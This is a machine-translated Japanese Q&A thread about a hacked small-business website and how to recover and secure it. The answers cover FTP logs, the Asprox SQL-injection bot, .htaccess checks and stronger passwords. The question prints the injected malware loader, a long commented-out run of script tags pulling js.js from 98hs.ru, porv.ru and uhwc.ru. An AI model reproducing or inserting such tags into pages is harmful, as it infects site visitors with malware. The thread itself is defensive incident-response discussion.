私のウェブサイトがハッキングされました。どうすればいいですか？[閉まっている]

Question

今日父から電話があり、父のウェブサイトにアクセスした人がコンピュータにダウンロードしようとして 168 個のウイルスに感染しているとのことでした。彼は技術的な知識がまったくなく、WYSIWYG エディターを使用してすべてを構築しました。

彼のサイトを開いてソースを見てみると、ソースの下部、HTML の終了タグの直前に Javascript インクルードの行がありました。彼らには (他の多くのファイルの中でも特に) 次のファイルが含まれていました。 http://www.98hs.ru/js.js <-- その URL にアクセスする前に Javascript をオフにしてください。

ということで、とりあえずコメントアウトしました。彼の FTP パスワードは 6 文字の長さの普通の辞書の単語だったことが判明したため、それがハッキングされた方法だと考えられます。私たちは彼のパスワードを 8 桁以上の単語以外の文字列に変更しました (彼は狩りとペックのタイプなので、パスフレーズを使用するつもりはありません)。

私はやった 98hs.ruのwhois チリのサーバーからホストされていることがわかりました。実際、それに関連付けられた電子メール アドレスもありますが、この人物が犯人であるとは非常に疑わしいです。おそらく他のサイトがハッキングされただけだと思います...

しかし、私はこれまでこの種のことに対処したことがないので、この時点で何をすべきかわかりません。何か提案がある人はいますか？

彼は、webhost4life.com 経由で、プレーン Jane のセキュリティ保護されていない FTP を使用していました。する方法さえ見当たりません する 彼らのサイトのSFTP。彼のユーザー名とパスワードが傍受されたのではないかと思いますか?

では、これをコミュニティとの関連性を高めるために、Web サイトをハッキングから保護するために実行する必要がある手順やベスト プラクティスは何でしょうか?

記録のために、これが彼のファイルに「魔法のように」追加されたコード行です（そして彼のコンピュータ上のファイルにはありません -- 何もしないことを確実にするためにコメントアウトしたままにしてあります）このページでは、ジェフはこれを避けるだろうと確信していますが):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->

Answer 1

できるだけ多くの情報を集めてみてください。ホストが、アカウントに対して行われたすべての FTP 接続を示すログを提供できるかどうかを確認してください。これらを使用すると、変更を行うために使用された FTP 接続であるかどうかを確認したり、IP アドレスを取得したりすることができます。

Wordpress、Drupal などの事前にパックされたソフトウェア、または自分でコーディングしていないものを使用している場合は、アップロード コードにこの種の変更を可能にする脆弱性がある可能性があります。カスタム構築されている場合は、ユーザーがファイルをアップロードしたり、既存のファイルを変更したりできる場所を再確認してください。

2 番目のことは、サイトのダンプを現状のまま取得し、その他の変更がないかすべてを確認することです。それは彼らが行ったたった 1 つの変更かもしれませんが、FTP 経由で侵入した場合、そこに他に何があるかは誰にも分かりません。

サイトを既知の正常な状態に戻し、必要に応じて最新バージョンにアップグレードします。

考慮しなければならないリターンのレベルもあります。この被害は、その人物を追跡する価値があるのでしょうか、それとも、これは単にあなたが生活し、より強力なパスワードを学び、使用しているだけのことなのでしょうか?

Answer 2

これは少し遅れていることは承知していますが、JavaScript について言及されている URL は、6 月に開始された ASPROx ボットの復活の一部であることが知られているサイトのリストに記載されています (少なくともその時点で、私たちは次のようなフラグを立てられていました)それ）。詳細については、以下で説明します。

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

これの厄介な点は、データベース内のすべての varchar 型フィールドが事実上「感染」して、この URL への参照を吐き出し、ブラウザがボットに変える小さな iframe を取得することです。この問題に対する基本的な SQL 修正はここにあります。

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

しかし、恐ろしいのは、ウイルスが感染する値をシステム テーブルで調べていることと、多くの共有ホスティング プランがクライアントのデータベース スペースも共有していることです。したがって、おそらく、感染したのはあなたのお父さんのサイトではなく、貧弱なコードを記述して SQL インジェクション攻撃への扉を開いた、ホスティング クラスター内の他の誰かのサイトでした。

彼がまだ修正していない場合は、ホストに緊急の電子メールを送信し、システム全体を修正するための SQL コードへのリンクを提供します。影響を受けたデータベース テーブルを自分で修正することはできますが、感染を行っているボットが再びその穴を通過し、全体に感染する可能性が高くなります。

これにより、作業に役立つ情報が得られることを願っています。

編集：もう 1 つ考えてみると、彼が Web サイトの構築にホストのオンライン デザイン ツールの 1 つを使用している場合、そのコンテンツはすべて列に配置されており、そのようにして感染した可能性があります。

Answer 3

お父さんがウェブサイト公開ツールを使用していたとおっしゃいましたね。

公開ツールがユーザーのコンピュータからサーバーに公開する場合、ローカル ファイルはクリーンであり、サーバーに再公開するだけで済む場合があります。

ただし、通常の FTP とは異なるサーバーへのログイン方法があるかどうかを確認する必要があります...これはパスワードを平文でインターネット上に送信するため、あまり安全ではありません。

Answer 4

6 単語文字のパスワードを使用した場合、彼は総当たり攻撃を受​​けた可能性があります。それは彼の FTP が傍受されるよりも可能性が高いですが、それも可能性があります。

より強力なパスワードから始めてください。(8キャラはまだかなり弱い)

このリンクがインターネットに接続されているかどうかを確認してください セキュリティブログ 役に立ちます。

Answer 5

サイトは単なる静的な HTML ですか?つまり彼は、車で通りかかる人が侵害されたスクリプトやページをアップロードできるようにするアップロード ページを自分でコーディングできなかったのですか?

webhost4life に利用可能な FTP ログがあるかどうか問い合わせて、問題を報告してみてはいかがでしょうか。あなたには決してわかりませんが、彼らは非常に受容的で、何が起こったのかを正確に見つけてくれるかもしれません?

私は共有ホスティング会社で働いていますが、このような報告は常に歓迎しており、通常は攻撃ベースの正確なベクトルを正確に特定し、顧客がどこで間違ったのかをアドバイスすることができます。

Answer 6

シャットダウン スクリプトを回避するために、Web サーバーをシャットダウンせずに切断します。別のコンピュータをデータ ドライブとして使用してハードディスクを分析し、ログ ファイルなどから原因を特定できるかどうかを確認します。コードが安全であることを確認してから、バックアップから復元します。

Answer 7

これは、ipower でホストされている私のクライアントで最近起こりました。あなたのホスティング環境が Apache ベースかどうかはわかりませんが、作成していない .htaccess ファイルがないか必ず再確認してください。特にウェブルートより上やイメージ ディレクトリ内にあるファイルは、何らかの厄介な問題を注入する傾向があるためです。同様に（参照内のどこから来たかに応じて人々をリダイレクトしていました）。また、自分が作成したもので、自分が書いていないコードも確認してください。

Answer 8

どうやら私たちは同じ人たちからハッキングされていたようです！私たちの場合はボットです。彼らは、もう誰も管理していない古い古典的な ASP サイトの URL に SQL インジェクションを使用していました。攻撃している IP を発見し、IIS でブロックしました。ここで、古い ASP をすべてリファクタリングする必要があります。したがって、私のアドバイスは、まず IIS ログを調べて、サイトのコードまたはサーバー構成に問題があるかどうかを確認することです。